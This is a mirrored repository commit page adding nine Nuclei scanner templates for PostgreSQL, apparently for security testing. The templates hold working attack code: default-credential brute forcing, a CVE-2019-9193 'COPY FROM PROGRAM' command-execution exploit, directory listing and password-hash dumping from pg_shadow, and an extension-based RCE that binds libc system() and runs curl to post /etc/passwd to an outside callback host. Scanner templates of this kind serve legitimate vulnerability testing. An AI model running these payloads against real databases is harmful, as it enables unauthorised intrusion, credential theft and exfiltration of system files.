daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #9427 from projectdiscovery/pgsql 

JS - pgsql
patch-1
Prince Chaddha 2024-04-05 21:09:50 +05:30 committed by GitHub
parent 83cde6cc9e ed3374d42e
commit a0b3a92f25
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
9 changed files with 429 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
javascript/cves/2019/CVE-2019-9193.yaml Normal file
View File

@ -0,0 +1,53 @@
id: CVE-2019-9193
info:
name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
author: pussycat0x
severity: high
description: |
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for COPY TO/FROM PROGRAM is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the COPY FROM PROGRAM.
reference:
- https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: cve,cve2018,js,network,postgresql,intrusive
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
const tbl = tbl_exec
const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",];
for (const x of qry){
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
Export(connected);
}
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
tbl_exec: "{{randbase(5)}}"
payloads:
usernames:
- postgres
database:
- postgres
password:
- postgres
attack: clusterbomb
matchers-condition: and
matchers:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: word
words:
- "cmd_output"

53
javascript/enumeration/pgsql/pgsql-default-db.yaml Normal file
View File

@ -0,0 +1,53 @@
id: pgsql-default-db
info:
name: Postgresql Default Database - Enumeration
author: pussycat0x
severity: high
description: |
postgres is the default database you will connect to before you have created any other databases.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-database-name
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: js,network,postgresql,authenticated
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ConnectWithDB(Host, Port, User, Pass, Db);
connected ;
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- foresight
- postgres
- template0
- template1
- test
attack: clusterbomb
matchers:
- type: dsl
dsl:
- "success == true"
- "response == true"
condition: and

47
javascript/enumeration/pgsql/pgsql-file-read.yaml Normal file
View File

@ -0,0 +1,47 @@
id: postgresql-file-read
info:
name: PostgreSQL File Read
author: pussycat0x
severity: high
description: |
Read and list the files within the PostgreSQL database,
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: js,network,postgresql,authenticated
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
Export(connected);
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[].pg_ls_dir'

48
javascript/enumeration/pgsql/pgsql-list-database.yaml Normal file
View File

@ -0,0 +1,48 @@
id: postgresql-list-database
info:
name: PostgreSQL List Database
author: pussycat0x
severity: high
description: |
A single Postgres server process can manage multiple databases at the same time. Each database is stored as a separate set of files in its own directory within the servers data directory.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: js,network,postgresql,authenticated
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database");
Export(connected);
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[].datname'

49
javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml Normal file
View File

@ -0,0 +1,49 @@
id: pgsql-exec
info:
name: PostgreSQL List Password Hashes
author: pussycat0x
severity: high
description: |
Dump password hashes in use within a PostgreSQL database.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: js,network,postgresql,authenticated
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
Export(connected)
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[] | "\(.usename) : \(.passwd)"'

47
javascript/enumeration/pgsql/pgsql-list-users.yaml Normal file
View File

@ -0,0 +1,47 @@
id: pgsql-list-users
info:
name: PostgreSQL List Users
author: pussycat0x
severity: high
description: |
List users from Postgresql Database.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: js,network,postgresql,enum,authenticated
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user");
Export(connected);
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[].usename'

47
javascript/enumeration/pgsql/pgsql-version-detect.yaml Normal file
View File

@ -0,0 +1,47 @@
id: pgsql-version-detect
info:
name: Postgresql Version - Detect
author: pussycat0x
severity: high
description: |
Detect Postgresql Version.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-version
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: js,network,postgresql,enum,authenticated
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();");
Export(connected);
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[0].version'

51
javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml Normal file
View File

@ -0,0 +1,51 @@
id: pgsql-extensions-rce
info:
name: PostgreSQL 8.1 Extensions - Remote Code Execution
author: pussycat0x
severity: high
description: |
PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism.
reference:
- https://www.dionach.com/postgresql-9-x-remote-command-execution/
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6
- https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: postgresql,js,network,rce
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
const collab = shurl
const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"];
for (const x of qry){
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
Export(connected);
}
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
shurl: http://{{interactsh-url}}
payloads:
usernames:
- postgres
database:
- postgres
password:
- postgres
attack: clusterbomb
matchers:
- type: regex
part: interactsh_request
regex:
- "root:[x*]:0:0:"

34
javascript/misconfiguration/pgsql/postgresql-empty-password.yaml Normal file
View File

@ -0,0 +1,34 @@
id: postgresql-empty-password
info:
name: Postgresql Empty Password - Detect
author: pussycat0x
severity: critical
description: |
Postgresql has a flaw that allows the attacker to login with empty password.
reference:
- https://www.tenable.com/plugins/nessus/104031
metadata:
shodan-query: product:"PostgreSQL"
verified: true
tags: js,network,postgresql,authenticated
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
const connected = client.Connect(Host, Port, User, Pass);
connected;
args:
Host: "{{Host}}"
Port: 5432
User: "postgres"
Pass: ""
matchers:
- type: dsl
dsl:
- "success == true"
- "response == true"
condition: and